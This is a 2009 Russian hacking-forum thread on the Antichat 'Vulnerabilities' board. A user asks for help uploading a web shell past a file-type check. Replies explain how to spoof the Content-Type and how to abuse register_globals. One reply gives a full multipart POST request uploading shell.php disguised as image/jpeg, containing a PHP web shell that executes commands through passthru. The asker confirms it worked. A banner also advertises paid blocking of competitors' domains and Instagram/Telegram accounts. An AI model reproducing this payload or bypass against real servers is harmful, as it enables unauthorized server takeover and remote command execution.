Форум АНТИЧАТ - Помогите залить шелл

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Помогите залить шелл

Опции темы

Поиск в этой теме

Опции просмотра

Помогите залить шелл (обойти $File_type)

28.12.2009, 20:51

vld2008

Новичок

Регистрация: 30.11.2006

Сообщений: 8

Провел на форуме:
40842

Репутация: 1

Помогите залить шелл (обойти $File_type)

не актуально

Последний раз редактировалось vld2008; 30.12.2009 в 06:30..

28.12.2009, 21:11

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.

29.12.2009, 12:28

vld2008

Новичок

Регистрация: 30.11.2006

Сообщений: 8

Провел на форуме:
40842

Репутация: 1

можешь небольшой пример привести?

29.12.2009, 12:56

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Цитата:

Сообщение от vld2008

можешь небольшой пример привести?

То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.

29.12.2009, 13:12

vld2008

Новичок

Регистрация: 30.11.2006

Сообщений: 8

Провел на форуме:
40842

Репутация: 1

Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
Если добавить

Цитата:

?d=/ПОЛНЫЙ ПУТЬ К ДИРЕКТОРИИ ДЛЯ ЗАЛИВКИ ФАЙЛА

в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить

Последний раз редактировалось vld2008; 29.12.2009 в 14:39..

29.12.2009, 13:19

krypt3r

Познавший АНТИЧАТ

Регистрация: 27.04.2007

Сообщений: 1,044

Провел на форуме:
3660186

Репутация: 905

Цитата:

можешь небольшой пример привести?

Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса

Код:

POST http://127.0.0.1/upload/ HTTP/1.1
Host: localhost
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=$session_id
Content-Length: 1024
Content-Type: multipart/form-data; boundary="6G+f"

--6G+f
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--6G+f
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg

<?php
  if (isset ($_GET['id']) && !empty ($_GET['id']))
    passthru ($_GET['id']);
  else
    echo "Empty";
?>
--6G+f
Content-Disposition: form-data; name="Upload"

Upload
--6G+f--

29.12.2009, 14:33

vld2008

Новичок

Регистрация: 30.11.2006

Сообщений: 8

Провел на форуме:
40842

Репутация: 1

Йухуу, есть такое дело

Спасибо, krypt3r

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Помогите залить шелл	niva622	Болталка	3	14.02.2009 00:17
Помогите залить шелл на phpBB 2.0.21 !	XXL	Разное - Покупка, продажа, обмен	3	19.07.2006 12:22

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход